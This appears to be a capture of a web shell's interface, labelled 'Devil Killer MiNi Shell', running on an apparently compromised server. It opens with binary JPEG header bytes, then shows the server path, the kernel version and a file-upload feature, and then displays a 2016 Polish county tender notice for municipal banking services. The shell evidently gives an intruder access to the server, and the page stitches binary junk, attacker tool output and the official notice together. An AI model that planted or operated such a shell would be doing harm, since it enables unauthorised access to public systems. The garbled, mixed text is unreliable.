JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160406/35465-N-2016.html

<p class="kh_header"><b>Ryki: Prowadzenie bankowej obsługi budżetu Powiatu Ryckiego oraz jego jednostek organizacyjnych</b><br>
<b>Numer ogłoszenia: 35465 - 2016; data zamieszczenia: 06.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Rycki , ul. Wyczółkowskiego 10A, 08-500 Ryki, woj. lubelskie, tel. 081 8657450, 8657472, faks 081 8651966.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spryki.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie bankowej obsługi budżetu Powiatu Ryckiego oraz jego jednostek organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie bankowej obsługi budżetu Powiatu Ryckiego oraz jego jednostek organizacyjnych.
Liczba jednostek organizacyjnych 18.
Liczba rachunków bieżących: 1 budżetu powiatu, 17 jednostek organizacyjnych powiatu,
 Liczba rachunków pomocniczych: 45, w tym 3 rachunki funduszy państwowych (Fundusz Pracy, PFRON).
Liczba stanowisk bankowości elektronicznej 40.
Liczba przelewów do obcego banku w ciągu 5 lat  - 153.035 szt.
Liczba przelewów w tym samym banku w ciągu 5 lat- 26.740 szt.
Szczegółowy wykaz jednostek organizacyjnych powiatu ryckiego, filii oraz stanowisk zamiejscowych  objętych przedmiotem zamówienia, ilość i rodzaj rachunków bankowych, stanowisk bankowości elektronicznej oraz wymogi Zamawiającego co do opłat dotyczących tychże rachunków zawiera załącznik Nr 1 do SIWZ.
Liczba jednostek organizacyjnych, ich forma organizacyjna oraz ilość rachunków bankowych została podana według stanu na dzień ogłaszania postępowania. W przypadku powstania, przekształcania w inną formę prawną, bądź potrzeby otwarcia nowego rachunku bankowego będą miały zastosowanie przepisy zawarte w umowie, a dotyczące jednostek lub rachunków już istniejących. Nowe rachunki będą otwierane i zamykane przez osoby uprawnione ze strony Zamawiającego i jego jednostek organizacyjnych, w wybranej placówce bankowej
 Przedmiot zamówienia obejmuje następujące działania:
1). Otwarcie, prowadzenie rachunku bieżącego budżetu powiatu i rachunków pomocniczych oraz otwarcie, prowadzenie i ewentualne zamykanie rachunków bieżących i pomocniczych jednostek organizacyjnych powiatu,
2). Realizację przelewów w systemie bankowości elektronicznej na rachunki w innych bankach oraz pomiędzy rachunkami Zamawiającego,
3).  Przyjmowanie przelewów z innych banków uznających rachunki Zamawiającego oraz z banku Wykonawcy,
4). Zainstalowanie ze stosownymi licencjami i uruchomienie systemu bankowości elektronicznej we wszystkich jednostkach organizacyjnych objętych umową oraz przeszkolenie pracowników w zakresie obsługi bankowości elektronicznej w ciągu jednego dnia od dnia zawarcia niniejszej umowy,
5). Zapewnienie kompleksowej obsługi systemu bankowości elektronicznej   w czasie obowiązywania umowy w standardzie zapewniającym bezpieczeństwo,
6). Uruchomienie punktu obsługi kasowej w siedzibie  Zamawiającego w Rykach przy ul. Wyczółkowskiego 10 A w dniu zawarcia umowy oraz zapewnienie możliwości wpłat i wypłat gotówkowych z rachunków i na rachunki objęte umową przez interesantów i upoważnionych pracowników,
7). Zapewnienie w punkcie kasowym w siedzibie Zamawiającego możliwości wnoszenia opłat przy użyciu terminala płatniczego od dnia  zawarcia niniejszej  umowy,
8). Zapewnienie wypłaty gotówkowej w siedzibie lub oddziale, filii  banku na terenie Miasta Ryki świadczeń dla bezrobotnych lub poszukujących pracy z Funduszu Pracy,
9). Zapewnienie, na terenie miasta Dęblina, obsługi kasowej jednostek organizacyjnych powiatu , jego filii i oddziałów zamiejscowych mających siedzibę na terenie Miasta Dęblin, w tym wypłaty świadczeń dla bezrobotnych oraz poszukujących pracy z Funduszu Pracy,
10). Udzielanie odnawialnego kredytu w rachunku bieżącym budżetu powiatu na pokrycie przejściowego deficytu w roku budżetowym, do kwoty wynikającej z uchwały budżetowej określonej corocznie  przez Radę Powiatu w Rykach w ramach upoważnienia dla Zarządu Powiatu w Rykach,
11). Automatyczne lokowanie wolnych środków z rachunku bieżącego budżetu powiatu na lokacie typu OVERNIGHT,
12). Dopisywanie na dany rachunek odsetek od środków zgromadzonych na rachunkach pomocniczych budżetu powiatu, za wyjątkiem subkonta dochodów skarbu państwa oraz na rachunkach pomocniczych jednostek organizacyjnych powiatu, za wyjątkiem subkonta dochodów skarbu państwa,
13). Codzienne sporządzanie wyciągów bankowych z każdego rachunku bankowego w systemie bankowości elektronicznej,
14). Na każdy wniosek Zamawiającego wydawanie zaświadczeń o prowadzeniu rachunku,  opinii, potwierdzania salda, przelewu na rachunku oraz historii  rachunku na potrzeby Zamawiającego,
15) Wydawanie na rzecz Zamawiającego blankietów czeków gotówkowych,
16) Pośredniczenie w przekazywaniu właściwym podmiotom żądań zapłaty należności z tytułu gwarancji zabezpieczenia należytego wykonania umowy lub gwarancji wadialnej w postępowaniach prowadzonych na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.


 Szczegółowy opis poszczególnych działań będących przedmiotem zamówienia:
      1. Wykonawca nie będzie pobierał opłat i prowizji za:
a) otwieranie, prowadzenie i zamykanie rachunków pomocniczych budżetu powiatu Zamawiającego,
b) otwieranie, prowadzenie i zamykanie rachunków pomocniczych jednostek organizacyjnych Zamawiającego,
c) przelewy do innych banków z rachunku pomocniczego budżetu powiatu Zamawiającego -subkonto dochodów Skarbu Państwa,
d) przelewy do innych banków z rachunków bieżących jednostek organizacyjnych Zamawiającego, 
e) za przelewy do innych banków z rachunku pomocniczego - subkonto dochodów Skarbu Państwa jednostek organizacyjnych Zamawiającego
f) od wpłat gotówkowych, dokonywanych na wszystkie rachunki bankowe Zamawiającego  przez osoby fizyczne i prawne oraz jednostki organizacyjne nieposiadające osobowości prawnej, w punktach kasowych, oddziałach i filiach banku z tytułów wymienionych w art. 4 ustawy z dnia 13 listopada 2003 roku o dochodach jednostek samorządu terytorialnego ( t.j. Dz. U. z 2014 roku, poz. 1115 ze zmianami), 
g) od wypłat gotówkowych, dokonywanych ze wszystkich rachunków bankowych Zamawiającego, na podstawie wystawionego czeku gotówkowego przez posiadacza rachunku w punktach kasowych, oddziałach i filiach  banku,  za wyjątkiem świadczeń dla bezrobotnych i poszukujących pracy z Funduszu Pracy,
h) za uruchomienie kredytu krótkoterminowego odnawialnego w rachunku bieżącym budżetu powiatu,
i) od salda niewykorzystanej części kredytu w rachunku bieżącym budżetu powiatu,
j) instalacji i przeszkolenia pracowników wszystkich jednostek organizacyjnych Zamawiającego systemu bankowości elektronicznej we wszystkich jednostkach wymienionych w załączniku nr 1 do SIWZ,
k) od instalacji terminala płatniczego w punkcie kasowym i od wpłat dokonywanych przy jego użyciu.
l) sporządzania historii rachunku na prośbę Zamawiającego,
m) poświadczenia realizacji przelewu w dniu przyjęcia do realizacji na prośbę Zamawiającego,
n) wydawania opinii bankowej lub zaświadczenia o prowadzonym rachunku bankowym,
o) przyjmowania karty wzorów podpisów  i jej zmiany,
p) wydanych  na rzecz  Zamawiającego blankietów czeków gotówkowych,
q) pośredniczenie w przekazywaniu właściwym podmiotom żądań zapłaty należności z tytułu gwarancji zabezpieczenia należytego wykonania umowy lub gwarancji wadialnej w postępowaniach prowadzonych na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.

2. Na wynagrodzenie wykonawcy za realizację przedmiotu zamówienia składać się będą następujące składniki:
a) opłata za prowadzenie rachunków bieżących jednostek organizacyjnych powiatu oraz rachunku bieżącego budżetu powiatu, która będzie pobierana z rachunku na zakończenie miesiąca,
b) opłata za przelew do obcego banku z rachunku bieżącego budżetu powiatu i rachunków pomocniczych  oraz z rachunków pomocniczych jednostek organizacyjnych powiatu , z wyjątkiem subkont dochodów skarbu państwa, która będzie pobierana na koniec każdego dnia,
c) opłata abonamentu za korzystanie z systemu bankowości elektronicznej za każde stanowisko, która będzie pobierana na koniec każdego miesiąca,
d) prowizja od wypłat świadczeń dla bezrobotnych i poszukujących pracy z rachunku  Funduszu Pracy, przy czym nie może ona być wyższa niż 0,8%  od wypłacanej kwoty , zgodnie z § 11. 1 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 7 października 2011 roku w sprawie szczegółowych zasad gospodarki finansowej Funduszu Pracy ( dz. U. z 2015 r., poz. 261 ), a będzie pobierana z rachunku na koniec każdego dnia wypłaty świadczeń,
e) odsetki od faktycznie wykorzystanego kredytu  krótkoterminowego odnawialnego w rachunku bieżącym budżetu powiatu, które będą pobierane w okresach miesięcznych w ostatnim dniu roboczym miesiąca.

3. Zasady funkcjonowania punktu kasowego w siedzibie Zamawiającego.
a) Zamawiający zobowiązuje się do zawarcia umowy najmu z Wykonawcą na lokal na parterze  w siedzibie Starostwa Powiatowego o pow. 8 m.kw, za który  będzie pobierał czynsz miesięczny w wysokości 150,00 zł ustalony zgodnie z Uchwałą Nr VIII/11/2003 Zarządu Powiatu w Rykach z dnia 10 stycznia 2003 r. w sprawie wysokości minimalnych stawek czynszu lokali użytkowych stanowiących własność Powiatu Ryckiego zmienioną Uchwałą Nr CCI/597/10 Zarządu Powiatu w Rykach oraz opłaty eksploatacyjne. Szczegółowe warunki korzystania z lokalu będzie regulowała odrębna umowa  najmu zawarta na czas obowiązywania umowy na obsługę bankową, projekt umowy najmu stanowi załącznik nr 8 do siwz. Natomiast wykonawca uruchomi w wynajętym lokalu punkt obsługi kasowej od dnia obowiązywania umowy na bankową obsługę budżetu powiatu. 
b) Dopuszcza się obsługę osób trzecich w uruchomionym punkcie kasowym. Potwierdzeniem dokonanej operacji  w punkcie kasowym dla wpłacającego i wypłacającego będzie dokument wydrukowany z systemu bankowości elektronicznej.  Średnioroczne obroty dzienne w punkcie kasowym oszacowano na podstawie danych historycznych z roku poprzedniego,  a kształtują się na poziomie 7 -8 tys. zł i mogą ulec zmianie w okresie obowiązywania umowy niezależnie od Zamawiającego.
4. Udzielanie Zamawiającemu odnawialnego kredytu krótkoterminowego w rachunku  bieżącym budżetu powiatu na pokrycie przejściowego deficytu w roku budżetowym. 
a) W ramach zawartej umowy na obsługę bankową Wykonawca zobowiązuje się udzielić Zamawiającemu na jego pisemny wniosek  kredytu krótkoterminowego odnawialnego w rachunku bieżącym budżetu powiatu w roku budżetowym,
b) Kredyt zostanie uruchomiony na podstawie  złożonego wniosku kredytowego oraz odrębnej umowy o kredyt w rachunku bieżącym budżetu powiatu do wysokości określonej corocznie w uchwale przez Radę Powiatu w Rykach w ramach upoważnienia dla Zarządu Powiatu w Rykach  wynikającego z uchwały budżetowej , a spłacony do końca roku budżetowego,
c) Wszystkie wpływy na rachunek bieżący budżetu powiatu będą pomniejszać kredyt, a Zamawiający nie dopuszcza możliwości pobierania opłat i prowizji bankowych od salda niewykorzystanej części kredytu,
d) Oprocentowanie kredytu w stosunku rocznym oparte będzie  na zmiennej stopie procentowej WIBOR  dla 1 miesięcznych złotowych depozytów międzybankowych ( ustalanej jako średnia z notowań  w okresie od pierwszego do dwudziestego piątego dnia miesiąca), plus stała marża banku w okresie obowiązywania umowy,
e) Odsetki od wykorzystanego kredytu będą pobierane z rachunku bieżącego budżetu powiatu w okresach miesięcznych, w ostatnim dniu roboczym miesiąca.
f) Zabezpieczeniem kredytu będzie weksel in blanco wraz z deklaracją wekslową oraz z kontrasygnatą skarbnika powiatu.

5. Automatyczne lokowanie wolnych środków na rachunku bieżącym budżetu powiatu na lokacie typu OVERNIGHT oraz oprocentowanie rachunków pomocniczych jednostek organizacyjnych powiatu.
a) Wykonawca automatycznie dokona przekazania wolnych środków pieniężnych znajdujących się na rachunku bieżącym budżetu powiatu  Zamawiającego na koniec każdego dnia na lokatę typu OVERNIGHT bez dodatkowych formalności, opłat i prowizji bankowych,
b) Powrót środków pieniężnych z lokaty wraz z należnymi odsetkami nastąpi następnego dnia roboczego i będzie to pierwsza operacja na rachunku,
c) Zamawiający zastrzega sobie możliwość rezygnacji z tej usługi w dowolnym czasie  obowiązywania umowy na jego pisemny wniosek bez żadnych opłat i prowizji bankowych.
d) Oprocentowanie lokat środków z rachunku bieżącego budżetu powiatu  w stosunku rocznym oparte będzie na zmiennej stawce WIBID  O/N minus marża niezmienna przez cały okres obowiązywania umowy, 
e) Oprocentowanie środków na rachunkach pomocniczych  budżetu powiatu i jego jednostek organizacyjnych w stosunku rocznym będzie oparte na zmiennej stawce WIBID 1M  minus marża niezmienna przez cały okres obowiązywania umowy. Odsetki będą naliczane w okresach miesięcznych w ostatnim dniu roboczym.  Zmiana wysokości oprocentowania będzie dokonywana w okresach miesięcznych w pierwszym dniu rozpoczynającym okres obrachunkowy w oparciu o stawkę WIBID 1M według notowań z pierwszego dnia roboczego dnia rozpoczynającego okres obrachunkowy( pierwszy dzień kalendarzowy miesiąca). Okresem obrachunkowym jest miesiąc kalendarzowy,
f) Środki na rachunkach bieżących jednostek organizacyjnych Zamawiającego oraz subkonta dochodów skarbu państwa są  nieoprocentowane.
g) Zmiany wysokości oprocentowania w okresie trwania umowy będą dokonywane jednostronnie przez Wykonawcę i mogą być związane ze zmianą WIBID 1 M.

6. Szczegółowy opis realizacji zleceń płatniczych oraz ich udokumentowanie.
a) Wykonawca zobowiązuje się do realizacji zleceń płatniczych Zamawiającego niezwłocznie w dniu ich złożenia pod warunkiem, że Zamawiający dysponuje środkami pieniężnymi na rachunku bankowym.
b) Realizacja przelewów wewnętrznych będzie następować w czasie rzeczywistym.
c) Wypłata świadczeń dla bezrobotnych i poszukujących pracy z Funduszu Pracy odbywa się na podstawie polecenia wypłaty wygenerowanego z systemu informatycznego służącego do obsługi bezrobotnych z podpisem osób wykazanych w karcie wzorów podpisów,
d) Wykonawca ponosi odpowiedzialność za szkody powstałe z jego winy wskutek  nieterminowej lub nieprawidłowej realizacji  zlecenia płatniczego Zamawiającego.
e) W przypadku niezrealizowania otrzymanej dyspozycji w ustalonym terminie, Wykonawca, na pisemny wniosek Zamawiającego zobowiązany jest wypłacić za okres opóźnienia karę umowną w wysokości 0,5% kwoty niezrealizowanej w terminie dyspozycji za każdy dzień opóźnienia.
f) Wyciągi z rachunków bankowych  z informacją o obciążeniach i uznaniach rachunku bankowego z podaniem pełnej identyfikacji kontrahenta , tytułu wpłaty i wypłaty, saldzie rachunku Wykonawca sporządza za każdy dzień  roboczy po jego zakończeniu i przekazuje za pośrednictwem systemu bankowości elektronicznej.
g) Wyciąg bankowy z rachunku Funduszu Pracy dodatkowo zawiera PESEL, osoby której wypłacono świadczenie.
h) Zamawiający oświadcza, że wyciągi bankowe doręczone w sposób określony w punkcie f) uważa za doręczone.
i) Zamawiający zobowiązuje się zgłosić Wykonawcy niezgodność obciążeń, uznań oraz niezgodności salda  na piśmie w ciągu 2 dni od dnia otrzymania wyciągu bankowego z rachunku..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.04.2021.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże posiadanie zezwolenia na prowadzenie działalności bankowej na terenie Rzeczypospolitej Polskiej zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo Bankowe</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca udokumentuje wykonanie lub wykonywanie w okresie ostatnich trzech lat przed upływem składania ofert, co najmniej jednej  usługi polegającej na prowadzeniu obsługi bankowej budżetu jednostki samorządu terytorialnego  lub jednostki administracji publicznej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca złoży oświadczenie zgodnie z załącznikiem nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 55</li>
<li>2 - Cena kredytu w rachunku bieżącym powiatu - 10</li>
<li>3 - Prowizja od wypłaty swiadczeń z Funduszu Pracy - 10</li>
<li>4 - Oprocentowanie lokat OVERNIGHT oraz rachunków pomocniczych jednostek organizacyjnych - 25</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
